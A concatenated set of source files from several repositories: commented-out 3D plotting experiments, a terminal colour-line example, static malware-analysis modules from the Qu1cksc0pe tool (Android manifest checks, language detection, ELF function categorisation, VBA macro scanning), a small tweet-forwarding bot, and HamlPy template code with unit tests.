# # VisPy point by point = SLOW AS HELL - - - - - - - - - - - - - - - - - - - -
# #from https://github.com/vispy/vispy/issues/1189
# # build your visuals
# Scatter3D = scene.visuals.create_visual_node(visuals.MarkersVisual)
#
# # The real-things : plot using scene
# # build canvas
# canvas = scene.SceneCanvas(keys='interactive', show=True)
#
# # Add a ViewBox to let the user zoom/rotate
# view = canvas.central_widget.add_view()
# view.camera = 'turntable'
# view.camera.fov = 45
# view.camera.distance = 300 #500
#
# n = recon.size #near 16 millions points: 256*256*256=16777216
# pos = np.zeros((n, 3))
# for i in range(0,recon.shape[0]):
# for j in range(0,recon.shape[1]):
# for k in range(0,recon.shape[2]):
# pos[i+j+k] = (i,j,k)
#
# #xyz = []
# #xyz = np.mgrid[0:recon.shape[0], 0:recon.shape[1], 0:recon.shape[2]]
# #xyz.append(np.arange(0,215,1))
#
# colors = np.ones((n, 4), dtype=np.float32)
# norm = plt.Normalize()
# colors = plt.cm.jet(norm(recon.reshape(-1)))
#
# # plot
# p1 = Scatter3D(parent=view.scene)
# p1.set_gl_state('translucent', blend=True, depth_test=True)
# p1.set_data(pos, face_color=colors)
# p1.symbol = visuals.marker_types[10]
#
# # run
# app.run()
# 3D visualization using matplotlib... slow ! - - - - - - - - - - - - - - - - -
# import itertools
# from mpl_toolkits.mplot3d import axes3d
# from matplotlib import animation
#
# N = 10 # nb of images
#
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax = plt.figure().gca(projection='3d')
# ax.set_xlabel('X')
# ax.set_ylabel('Y')
# ax.set_zlabel('Z')
# #pcm = ax.pcolormesh(x, y, Z, vmin=-1., vmax=1., cmap='RdBu_r')
#
# # load some test data for demonstration and plot a wireframe
# #X, Y, Z = axes3d.get_test_data(0.1)
# #ax.plot_wireframe(X, Y, Z, rstride=5, cstride=5)
#
# recon[:,:,-1].shape
#
# xyz = recon.reshape(-1)
# xyz = plt.cm.Greys_r(xyz)
#
# x = np.linspace(0,256, 256)
# y = np.linspace(0,256, 256)
# z = np.linspace(0,256, 256)
# points = []
# for element in itertools.product(x, y, z):
# points.append(element)
# fxyz = map(xyz, points)
# xi, yi, zi = zip(*points)
#
# ax.scatter(xi, yi, zi, c=fxyz, alpha=0.5) #,cmap=plt.cm.Greys_r
# fig.tight_layout()
# plt.show()
#
# # rotate the axes and update
# #for angle in range(0, 360):
# # ax.view_init(30, angle)
# # plt.draw()
# # plt.pause(.001)
#
# def update(num):
# ax.view_init(30, num*(360/N))
#
# ani = animation.FuncAnimation(fig, update, N, interval=10000/N, blit=False)
# ani.save('matplot002.gif', writer='imagemagick')
#
#
#
#
# import mpl_toolkits.mplot3d.axes3d as p3
# from matplotlib import animation
#
# fig = plt.figure()
# ax = p3.Axes3D(fig)
#
# def gen(n):
# phi = 0
# nb_rotation = 1
# while phi < nb_rotation*np.pi:
# yield np.array([np.cos(phi), np.sin(phi), phi])
# phi += nb_rotation*np.pi/n
#
# def update(num, data, line):
# line.set_data(data[:2, :num])
# line.set_3d_properties(data[2, :num])
#
# N = 100
# data = np.array(list(gen(N))).T
# line, = ax.plot(data[0, 0:1], data[1, 0:1], data[2, 0:1])
#
# # Setting the axes properties
# ax.set_xlim3d([-1.0, 1.0])
# ax.set_xlabel('X')
#
# ax.set_ylim3d([-1.0, 1.0])
# ax.set_ylabel('Y')
#
# ax.set_zlim3d([0.0, 10.0])
# ax.set_zlabel('Z')
#
# ani = animation.FuncAnimation(fig, update, N, fargs=(data, line), interval=10000/N, blit=False)
# #ani.save('matplot003.gif', writer='imagemagick')
# plt.show()
#
#
# # - - - - - -
# # Visualization :
#
# from skimage import measure
# from mpl_toolkits.mplot3d import Axes3D
# from mpl_toolkits.mplot3d.art3d import Poly3DCollection
# def make_mesh(image, threshold=-300, step_size=1):
# print("Transposing surface")
# #p = image.transpose(2,1,0) #TODO: don't transpose as we have (x, y, z) images
# p = image.transpose(0,2,1) # simply inverse X and Y
#
# print("Calculating surface")
# verts, faces, norm, val = measure.marching_cubes(p, threshold, step_size=step_size, allow_degenerate=True)
# return verts, faces
#
# def plotly_3d(verts, faces):
# x,y,z = zip(*verts)
# print("Drawing")
# # Make the colormap single color since the axes are positional not intensity.
# #colormap=['rgb(255,105,180)','rgb(255,255,51)','rgb(0,191,255)']
# colormap=['rgb(236, 236, 212)','rgb(236, 236, 212)']
#
# fig = FF.create_trisurf(x=x,
# y=y,
# z=z,
# plot_edges=False,
# colormap=colormap,
# simplices=faces,
# backgroundcolor='rgb(64, 64, 64)',
# title="Interactive Visualization")
# iplot(fig)
#
# def plt_3d(verts, faces):
# print("Drawing")
# x,y,z = zip(*verts)
# fig = plt.figure(figsize=(10, 10))
# ax = fig.add_subplot(111, projection='3d')
#
# # Fancy indexing: `verts[faces]` to generate a collection of triangles
# mesh = Poly3DCollection(verts[faces], linewidths=0.05, alpha=1)
# face_color = [1, 1, 0.9]
# mesh.set_facecolor(face_color)
# ax.add_collection3d(mesh)
#
# ax.set_xlim(0, max(x))
# ax.set_ylim(0, max(y))
# ax.set_zlim(0, max(z))
# ax.set_axis_bgcolor((0.7, 0.7, 0.7))
# plt.show()
# v, f = make_mesh(recon, 0)#
# plt_3d(v, f)
#
#
#
#
#
# #Animation from : http://jakevdp.github.io/blog/2012/08/18/matplotlib-animation-tutorial/
# from matplotlib import animation
# # First set up the figure, the axis, and the plot element we want to animate
# fig = plt.figure()
# ax = plt.axes(xlim=(0, 255), ylim=(0, 255))
# line, = ax.plot([], [], lw=2)
#
# # initialization function: plot the background of each frame
# def init():
# line.set_data([], [])
# return line,
#
# # animation function. This is called sequentially
# def animate(i):
# x = np.linspace(0, 2, 1000)
# y = np.sin(2 * np.pi * (x - 0.01 * i))
# line.set_data(x, y)
# return line,
#
# # call the animator. blit=True means only re-draw the parts that have changed.
# anim = animation.FuncAnimation(fig, animate, init_func=init,
# frames=200, interval=20, blit=True)
#
# # save the animation as an mp4. This requires ffmpeg or mencoder to be
# # installed. The extra_args ensure that the x264 codec is used, so that
# # the video can be embedded in html5. You may need to adjust this for
# # your system: for more information, see
# # http://matplotlib.sourceforge.net/api/animation_api.html
# anim.save('basic_animation.mp4', fps=30, extra_args=['-vcodec', 'libx264'])
# plt.show()
``` |
{
"source": "A1rPun/GarterLine",
"score": 3
} |
#### File: A1rPun/GarterLine/example.py
```python
from garterline import GarterLine
def example1():
line = GarterLine()
line.color("red")
line.text("Hello")
line.color("blue")
line.text("World")
return line
def example2():
percentReady90 = ["In", "other", "words", "it's", "almost", "completed"]
line = GarterLine()
line.color("blue", "green")
line.text(" ░ ".join(percentReady90))
return line
def example3():
line = GarterLine()
line.color("black", "blue")
line.text("SyntaxError")
line.color(background="lightblue")
line.text("(unicode error) 'unicodeescape'")
line.color(background="cyan")
line.text("codec can't decode bytes in position 0-1")
line.color(background="lightcyan")
line.text("truncated \\uXXXX escape")
return line
def clear(msg=""):
return GarterLine().text(msg).color()
#"Lisää viinaa silmät liikkuu :)"
print(clear("GarterLine examples"))
print(example1())
print(example2())
print(example3())
print(clear())
``` |
{
"source": "A1S0N/Qu1cksc0pe",
"score": 3
} |
#### File: Qu1cksc0pe/Modules/apkSecCheck.py
```python
import sys
import xml.etree.ElementTree as etr
try:
from prettytable import PrettyTable
except:
print("Error: >prettytable< module not found.")
sys.exit(1)
try:
from colorama import Fore, Style
except:
print("Error: >colorama< module not found.")
sys.exit(1)
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
def ManifestAnalysis():
# Obtaining manifest file
try:
manifest_path = "TargetAPK/resources/AndroidManifest.xml"
manifest_tree = etr.parse(manifest_path)
manifest_root = manifest_tree.getroot()
except FileNotFoundError:
print(f"{errorS} An error occured while parsing {green}AndroidManifest.xml{white}. Did your APK file decompiled correctly?")
sys.exit(1)
# Gathering informations
app_data = manifest_root.findall("application")
perm_data = manifest_root.findall("permission")
# General information
sec_dict = {
"{http://schemas.android.com/apk/res/android}debuggable": "No entry found.",
"{http://schemas.android.com/apk/res/android}usesCleartextTraffic": "No entry found.",
"{http://schemas.android.com/apk/res/android}allowBackup": "No entry found.",
"{http://schemas.android.com/apk/res/android}networkSecurityConfig": f"{red}Not found{white}"
}
# Check for values
print(f"\n{infoS} Checking basic security options...")
for sec in sec_dict:
if sec in app_data[0].keys():
if sec == "{http://schemas.android.com/apk/res/android}networkSecurityConfig":
sec_dict[sec] = f"{green}Found{white}"
else:
if app_data[0].attrib[sec] == "false":
sec_dict[sec] = f"{green}Secure{white}"
else:
sec_dict[sec] = f"{red}Insecure{white}"
# Tables!!
reportTable = PrettyTable()
reportTable.field_names = [f"{yellow}Debuggable{white}", f"{yellow}AllowBackup{white}", f"{yellow}ClearTextTraffic{white}", f"{yellow}NetworkSecurityConfig{white}"]
reportTable.add_row(
[
sec_dict['{http://schemas.android.com/apk/res/android}debuggable'],
sec_dict['{http://schemas.android.com/apk/res/android}allowBackup'],
sec_dict['{http://schemas.android.com/apk/res/android}usesCleartextTraffic'],
sec_dict['{http://schemas.android.com/apk/res/android}networkSecurityConfig']
]
)
print(reportTable)
# Check for permission flags
permLevel = "No entry found."
print(f"\n{infoS} Checking application permission flags...")
try:
if "{http://schemas.android.com/apk/res/android}protectionLevel" in perm_data[0].keys():
if perm_data[0].attrib["{http://schemas.android.com/apk/res/android}protectionLevel"] == "signature" or perm_data[0].attrib["{http://schemas.android.com/apk/res/android}protectionLevel"] == "signatureOrSystem":
permLevel = f"{green}{perm_data[0].attrib['{http://schemas.android.com/apk/res/android}protectionLevel']}{white}"
else:
permLevel = f"{red}{perm_data[0].attrib['{http://schemas.android.com/apk/res/android}protectionLevel']}{white}"
permTable = PrettyTable()
permTable.field_names = [f"{yellow}Permission{white}", f"{yellow}Flag{white}"]
permTable.add_row(
[
perm_data[0].attrib["{http://schemas.android.com/apk/res/android}name"],
permLevel
]
)
print(permTable)
except IndexError:
print(f"{errorS} There is no entry about permission flags.")
# Exported activities
exp_indicator = 0
print(f"\n{infoS} Searching for exported activities...")
# Pretty output
actTable = PrettyTable()
actTable.field_names = [f"{yellow}Activity{white}", f"{yellow}Exported{white}"]
for tags in range(0, len(app_data[0])):
if app_data[0][tags].tag == "activity":
if "{http://schemas.android.com/apk/res/android}exported" in app_data[0][tags].keys():
if app_data[0][tags].get("{http://schemas.android.com/apk/res/android}exported") == "true":
actTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{red}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
exp_indicator += 1
else:
actTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{green}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
exp_indicator += 1
if exp_indicator == 0:
print(f"{errorS} There is no entry about exported activites.")
else:
print(actTable)
# Exported providers
pro_indicator = 0
print(f"\n{infoS} Searching for exported providers...")
# Pretty output
proTable = PrettyTable()
proTable.field_names = [f"{yellow}Provider{white}", f"{yellow}Exported{white}"]
for tags in range(0, len(app_data[0])):
if app_data[0][tags].tag == "provider":
if "{http://schemas.android.com/apk/res/android}exported" in app_data[0][tags].keys():
if app_data[0][tags].get("{http://schemas.android.com/apk/res/android}exported") == "true":
proTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{red}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
pro_indicator += 1
else:
proTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{green}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
pro_indicator += 1
if pro_indicator == 0:
print(f"{errorS} There is no entry about exported providers.")
else:
print(proTable)
# Execution
ManifestAnalysis()
```
#### File: Qu1cksc0pe/Modules/languageDetect.py
```python
import sys
try:
import puremagic as pr
except:
print("Error: >puremagic< module not found.")
sys.exit(1)
try:
from colorama import Fore, Style
except:
print("Error: >colorama< module not found.")
sys.exit(1)
# Getting name of the file for executable checker function
fileName = str(sys.argv[1])
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
foundS = f"{cyan}[{red}+{cyan}]{white}"
# All strings
allStrings = open("temp.txt", "r").read().split("\n")
# Strings for identifying programming language
detector = {"Golang": ["GODEBUG", "runtime.goexit", "runtime.gopanic"],
"Nim": ["echoBinSafe", "nimFrame", "stdlib_system.nim.c", "nimToCStringConv"],
"Python": ["_PYI_PROCNAME", "Py_BuildValue", "Py_Initialize", "__main__", "pydata", "libpython3.9.so.1.0", "py_compile"],
"Zig": ["ZIG_DEBUG_COLOR", "__zig_probe_stack", "__zig_return_error", "ZIG"],
"C#": ["#GUID", "</requestedPrivileges>", "<security>", "mscoree.dll", "System.Runtime", "</assembly>", ".NET4.0E", "_CorExeMain"],
"C++": ["std::", "libstdc++.so.6", "GLIBCXX_3.4.9", "CXXABI_1.3.9"],
"C": ["__libc_start_main", "GLIBC_2.2.5", "libc.so.6", "__cxa_finalize", ".text"]
} # TODO: Look for better solutions instead of strings!!
# This function scans special strings in binary files
def LanguageDetect():
print(f"{infoS} Performing language detection. Please wait!!")
# Basic string scan :)
indicator = 0
for key in detector:
for val in detector[key]:
if val in allStrings:
print(f"{foundS} Possible programming language: {green}{key}{white}\n")
indicator += 1
sys.exit(0)
if indicator == 0:
print(f"{errorS} Programming language couldn\'t detected :(\n")
sys.exit(1)
# This function analyses if given file is an executable file
def ExecutableCheck(fileName):
exe_indicator = 0
try:
magicNums = list(pr.magic_file(fileName))
for mag in range(0, len(magicNums)):
if magicNums[mag].confidence >= 0.4:
if "executable" in str(magicNums[mag].name) or "Executable" in str(magicNums[mag].name):
exe_indicator += 1
if exe_indicator != 0:
return True
else:
return False
except:
pass
# Execution
if ExecutableCheck(fileName) == True:
LanguageDetect()
else:
print(f"{errorS} Please scan executable files.\n")
sys.exit(1)
```
#### File: Qu1cksc0pe/Modules/linAnalyzer.py
```python
import os
import sys
import json
try:
from prettytable import PrettyTable
except:
print("Error: >prettytable< module not found.")
sys.exit(1)
try:
import puremagic as pr
except:
print("Error: >puremagic< module not found.")
sys.exit(1)
try:
from colorama import Fore, Style
except:
print("Error: >colorama< module not found.")
sys.exit(1)
# Getting name of the file for statistics
fileName = str(sys.argv[1])
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
# Legends
errorS = f"{cyan}[{red}!{cyan}]{white}"
infoS = f"{cyan}[{red}*{cyan}]{white}"
# Gathering Qu1cksc0pe path variable
sc0pe_path = open(".path_handler", "r").read()
# Wordlists
allStrings = open("temp.txt", "r").read().split("\n")
allThings = open("elves.txt", "r").read()
sections = open(f"{sc0pe_path}/Systems/Linux/sections.txt", "r").read().split("\n")
segments = open(f"{sc0pe_path}/Systems/Linux/segments.txt", "r").read().split("\n")
networkz = open(f"{sc0pe_path}/Systems/Linux/Networking.txt", "r").read().split("\n")
filez = open(f"{sc0pe_path}/Systems/Linux/Files.txt", "r").read().split("\n")
procesz = open(f"{sc0pe_path}/Systems/Linux/Processes.txt", "r").read().split("\n")
memoryz = open(f"{sc0pe_path}/Systems/Linux/Memory.txt", "r").read().split("\n")
infogaz = open(f"{sc0pe_path}/Systems/Linux/Infoga.txt", "r").read().split("\n")
persisz = open(f"{sc0pe_path}/Systems/Linux/Persistence.txt", "r").read().split("\n")
cryptoz = open(f"{sc0pe_path}/Systems/Linux/Crypto.txt", "r").read().split("\n")
otherz = open(f"{sc0pe_path}/Systems/Linux/Others.txt", "r").read().split("\n")
# Categories
Networking = []
File = []
Process = []
Memory = []
Information_Gathering = []
System_Persistence = []
Cryptography = []
Other = []
# Scores
scoreDict = {
"Networking": 0,
"File": 0,
"Process": 0,
"Memory Management": 0,
"Information Gathering": 0,
"System/Persistence": 0,
"Cryptography": 0,
"Other/Unknown": 0
}
# Dictionary of categories
Categs = {
"Networking": Networking,
"File": File,
"Process": Process,
"Memory Management": Memory,
"Information Gathering": Information_Gathering,
"System/Persistence": System_Persistence,
"Cryptography": Cryptography,
"Other/Unknown": Other
}
# Dictionary of arrays
dictArr = {
"Networking": networkz,
"File": filez,
"Process": procesz,
"Memory Management": memoryz,
"Information Gathering": infogaz,
"System/Persistence": persisz,
"Cryptography": cryptoz,
"Other/Unknown": otherz
}
# Defining function
def Analyzer():
allFuncs = 0
tables = PrettyTable()
secTable = PrettyTable()
segTable = PrettyTable()
resTable = PrettyTable()
statistics = PrettyTable()
for key in dictArr:
for elem in dictArr[key]:
if elem in allStrings:
if elem != "":
Categs[key].append(elem)
allFuncs +=1
for key in Categs:
if Categs[key] != []:
if key == "Information Gathering" or key == "System/Persistence" or key == "Cryptography":
print(f"\n{yellow}[{red}!{yellow}]__WARNING__[{red}!{yellow}]{white}")
# Printing zone
tables.field_names = [f"Functions or Strings about {green}{key}{white}"]
for i in Categs[key]:
if i == "":
pass
else:
tables.add_row([f"{red}{i}{white}"])
# Threat score
if key == "Networking":
scoreDict[key] += 1
elif key == "File":
scoreDict[key] += 1
elif key == "Process":
scoreDict[key] += 1
elif key == "Memory Management":
scoreDict[key] += 1
elif key == "Information Gathering":
scoreDict[key] += 1
elif key == "System/Persistence":
scoreDict[key] += 1
elif key == "Cryptography":
scoreDict[key] += 1
elif key == "Other/Unknown":
scoreDict[key] += 1
else:
pass
print(tables)
tables.clear_rows()
# Gathering sections and segments
secTable.field_names = [f"{green}Sections{white}"]
segTable.field_names = [f"{green}Segments{white}"]
# Sections
sec_indicator = 0
for se1 in sections:
if se1 in allThings:
if se1 != "":
secTable.add_row([f"{red}{se1}{white}"])
sec_indicator += 1
if sec_indicator != 0:
print(secTable)
# Segments
seg_indicator = 0
for se2 in segments:
if se2 in allThings:
if se2 != "":
segTable.add_row([f"{red}{se2}{white}"])
seg_indicator += 1
if seg_indicator != 0:
print(segTable)
# Resource scanner zone
print(f"\n{infoS} Performing magic number analysis...")
resCounter = 0
resTable.field_names = [f"File Extensions", "Names", "Byte Matches", "Confidence"]
resourceList = list(pr.magic_file(fileName))
for res in range(0, len(resourceList)):
extrExt = str(resourceList[res].extension)
extrNam = str(resourceList[res].name)
extrByt = str(resourceList[res].byte_match)
if resourceList[res].confidence >= 0.4:
resCounter += 1
if extrExt == '':
resTable.add_row([f"{red}No Extension{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
else:
resTable.add_row([f"{red}{extrExt}{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
if len(resourceList) != 0:
print(resTable)
# Statistics zone
print(f"\n{green}->{white} Statistics for: {green}{fileName}{white}")
# Printing zone
statistics.field_names = ["Categories", "Number of Functions"]
statistics.add_row([f"{green}All Functions{white}", f"{green}{allFuncs}{white}"])
for key in scoreDict:
if scoreDict[key] == 0:
pass
else:
if key == "System/Persistence" or key == "Cryptography" or key == "Information Gathering":
statistics.add_row([f"{yellow}{key}{white}", f"{red}{scoreDict[key]}{white}"])
else:
statistics.add_row([f"{white}{key}", f"{scoreDict[key]}{white}"])
print(statistics)
# Warning about obfuscated file
if allFuncs < 10:
print(f"\n{errorS} This file might be obfuscated or encrypted. Try {green}--packer{white} to scan this file for packers.\n")
sys.exit(0)
# Execute
try:
Analyzer()
if os.path.exists("Modules/elves.txt"):
os.remove("Modules/elves.txt")
except:
pass
```
#### File: Qu1cksc0pe/Modules/nonExecAnalyzer.py
```python
import os
import sys
# Checking for puremagic
try:
import puremagic as pr
except:
print("Error: >puremagic< module not found.")
sys.exit(1)
# Checking for colorama
try:
from colorama import Fore, Style
except:
print("Error: >colorama< not found.")
sys.exit(1)
# Checking for prettytable
try:
from prettytable import PrettyTable
except:
print("Error: >prettytable< module not found.")
sys.exit(1)
# Checking for oletools
try:
from oletools.olevba import VBA_Parser
from oletools.crypto import is_encrypted
from oletools.oleid import OleID
from olefile import isOleFile
except:
print("Error: >oletools< module not found.")
print("Try 'sudo -H pip3 install -U oletools' command.")
sys.exit(1)
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
# Target file
targetFile = str(sys.argv[1])
# A function that finds VBA Macros
def MacroHunter(targetFile):
answerTable = PrettyTable()
answerTable.field_names = [f"{green}Threat Levels{white}", f"{green}Macros{white}", f"{green}Descriptions{white}"]
print(f"\n{infoS} Looking for VBA Macros...")
try:
fileData = open(targetFile, "rb").read()
vbaparser = VBA_Parser(targetFile, fileData)
macroList = list(vbaparser.analyze_macros())
if vbaparser.contains_macros == True:
for fi in range(0, len(macroList)):
if macroList[fi][0] == 'Suspicious':
if "(use option --deobf to deobfuscate)" in macroList[fi][2]:
sanitized = f"{macroList[fi][2]}".replace("(use option --deobf to deobfuscate)", "")
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{sanitized}"])
elif "(option --decode to see all)" in macroList[fi][2]:
sanitized = f"{macroList[fi][2]}".replace("(option --decode to see all)", "")
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{sanitized}"])
else:
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
elif macroList[fi][0] == 'IOC':
answerTable.add_row([f"{magenta}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
elif macroList[fi][0] == 'AutoExec':
answerTable.add_row([f"{red}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
else:
answerTable.add_row([f"{macroList[fi][0]}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
print(f"{answerTable}\n")
else:
print(f"{errorS} Not any VBA macros found.")
except:
print(f"{errorS} An error occured while parsing that file for macro scan.")
# Gathering basic informations
def BasicInfoGa(targetFile):
# Check for ole structures
if isOleFile(targetFile) == True:
print(f"{infoS} Ole File: {green}True{white}")
else:
print(f"{infoS} Ole File: {red}False{white}")
# Check for encryption
if is_encrypted(targetFile) == True:
print(f"{infoS} Encrypted: {green}True{white}")
else:
print(f"{infoS} Encrypted: {red}False{white}")
# VBA_MACRO scanner
vbascan = OleID(targetFile)
vbascan.check()
# Sanitizing the array
vba_params = []
for vb in vbascan.indicators:
vba_params.append(vb.id)
if "vba_macros" in vba_params:
for vb in vbascan.indicators:
if vb.id == "vba_macros":
if vb.value == True:
print(f"{infoS} VBA Macros: {green}Found{white}")
MacroHunter(targetFile)
else:
print(f"{infoS} VBA Macros: {red}Not Found{white}")
else:
MacroHunter(targetFile)
# A function that handles file types, extensions etc.
def MagicParser(targetFile):
# Defining table
resTable = PrettyTable()
# Magic byte parsing
resCounter = 0
resTable.field_names = [f"File Extension", "Names", "Byte Matches", "Confidence"]
resourceList = list(pr.magic_file(targetFile))
for res in range(0, len(resourceList)):
extrExt = str(resourceList[res].extension)
extrNam = str(resourceList[res].name)
extrByt = str(resourceList[res].byte_match)
if resourceList[res].confidence >= 0.8:
resCounter += 1
if extrExt == '':
resTable.add_row([f"{red}No Extension{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
else:
resTable.add_row([f"{red}{extrExt}{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
if len(resourceList) != 0:
print(resTable)
# Execution area
try:
BasicInfoGa(targetFile)
print(f"\n{infoS} Performing magic number analysis...")
MagicParser(targetFile)
except:
print(f"{errorS} An error occured while analyzing that file.")
sys.exit(1)
``` |
{
"source": "A1S0N/TweetsMonitor",
"score": 3
} |
#### File: A1S0N/TweetsMonitor/main.py
```python
from twitter import *
import telepot
bot = telepot.Bot(#')
myId = '#'
config = {}
execfile("config.py", config)
twitter = Twitter(
auth = OAuth(config["access_key"], config["access_secret"], config["consumer_key"], config["consumer_secret"]))
user = "@A1S0N_"
results = twitter.statuses.user_timeline(screen_name = user)
def main():
f = open('tweets.tw','r+')
content = f.read()
for status in results:
var = status["text"].encode("ascii", "ignore")
if var in content:
pass
else:
bot.sendMessage(myId, var)
f.write(var)
f.close()
main()
``` |
{
"source": "a1s/HamlPy",
"score": 2
} |
#### File: HamlPy/hamlpy/templatize.py
```python
try:
from django.utils import translation
_django_available = True
except ImportError, e:
_django_available = False
import hamlpy
import os
def decorate_templatize(func):
def templatize(src, origin=None, **kwargs):
#if the template has no origin file then do not attempt to parse it with haml
if origin:
#if the template has a source file, then only parse it if it is haml
if os.path.splitext(origin)[1].lower() in ['.'+x.lower() for x in hamlpy.VALID_EXTENSIONS]:
hamlParser = hamlpy.Compiler()
src = hamlParser.process(src)
return func(src, origin=origin, **kwargs)
return templatize
if _django_available:
translation.templatize = decorate_templatize(translation.templatize)
```
#### File: hamlpy/test/test_elements.py
```python
from nose.tools import eq_
from hamlpy.elements import Element
class TestElement(object):
def test_attribute_value_not_quoted_when_looks_like_key(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{name:"viewport", content:"width:device-width, initial-scale:1, minimum-scale:1, maximum-scale:1"}''')
eq_(s1['content'], "content='width:device-width, initial-scale:1, minimum-scale:1, maximum-scale:1'")
eq_(s1['name'], "name='viewport'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:"a:x, b:'y', c:1, e:3"}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, e:3'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:"a:x, b:'y', c:1, d:\\"dk\\", e:3"}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, d:\"dk\", e:3'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:'a:x, b:\\'y\\', c:1, d:"dk", e:3'}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, d:\"dk\", e:3'")
def test_dashes_work_in_attribute_quotes(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{"data-url":"something", "class":"blah"}''')
eq_(s1['data-url'], "data-url='something'")
eq_(s1['class'], 'blah')
s1 = sut._parse_attribute_dictionary('''{data-url:"something", class:"blah"}''')
eq_(s1['data-url'], "data-url='something'")
eq_(s1['class'], 'blah')
def test_escape_quotes_except_django_tags(self):
sut = Element('')
s1 = sut._escape_attribute_quotes('''{% url 'blah' %}''')
eq_(s1,'''{% url 'blah' %}''')
s2 = sut._escape_attribute_quotes('''blah's blah''s {% url 'blah' %} blah's blah''s''')
eq_(s2,r"blah\'s blah\'\'s {% url 'blah' %} blah\'s blah\'\'s")
def test_attributes_parse(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{a:'something',"b":None,'c':2}''')
eq_(s1['a'], "a='something'")
eq_(s1['b'], "b")
eq_(s1['c'], "c='2'")
eq_(sut.attributes, "a='something' b c='2'")
def test_pulls_tag_name_off_front(self):
sut = Element('%div.class')
eq_(sut.tag, 'div')
def test_default_tag_is_div(self):
sut = Element('.class#id')
eq_(sut.tag, 'div')
def test_parses_id(self):
sut = Element('%div#someId.someClass')
eq_(sut.id, 'someId')
sut = Element('#someId.someClass')
eq_(sut.id, 'someId')
def test_no_id_gives_empty_string(self):
sut = Element('%div.someClass')
eq_(sut.id, '')
def test_parses_class(self):
sut = Element('%div#someId.someClass')
eq_(sut.classes, 'someClass')
def test_properly_parses_multiple_classes(self):
sut = Element('%div#someId.someClass.anotherClass')
eq_(sut.classes, 'someClass anotherClass')
def test_no_class_gives_empty_string(self):
sut = Element('%div#someId')
eq_(sut.classes, '')
def test_attribute_dictionary_properly_parses(self):
sut = Element("%html{'xmlns':'http://www.w3.org/1999/xhtml', 'xml:lang':'en', 'lang':'en'}")
assert "xmlns='http://www.w3.org/1999/xhtml'" in sut.attributes
assert "xml:lang='en'" in sut.attributes
assert "lang='en'" in sut.attributes
def test_id_and_class_dont_go_in_attributes(self):
sut = Element("%div{'class':'hello', 'id':'hi'}")
assert 'class=' not in sut.attributes
assert 'id=' not in sut.attributes
def test_attribute_merges_classes_properly(self):
sut = Element("%div.someClass.anotherClass{'class':'hello'}")
assert 'someClass' in sut.classes
assert 'anotherClass' in sut.classes
assert 'hello' in sut.classes
def test_attribute_merges_ids_properly(self):
sut = Element("%div#someId{'id':'hello'}")
eq_(sut.id, 'someId_hello')
def test_can_use_arrays_for_id_in_attributes(self):
sut = Element("%div#someId{'id':['more', 'andMore']}")
eq_(sut.id, 'someId_more_andMore')
def test_self_closes_a_self_closing_tag(self):
sut = Element(r"%br")
assert sut.self_close
def test_does_not_close_a_non_self_closing_tag(self):
sut = Element("%div")
assert sut.self_close == False
def test_can_close_a_non_self_closing_tag(self):
sut = Element("%div/")
assert sut.self_close
def test_properly_detects_django_tag(self):
sut = Element("%div= $someVariable")
assert sut.django_variable
def test_knows_when_its_not_django_tag(self):
sut = Element("%div Some Text")
assert sut.django_variable == False
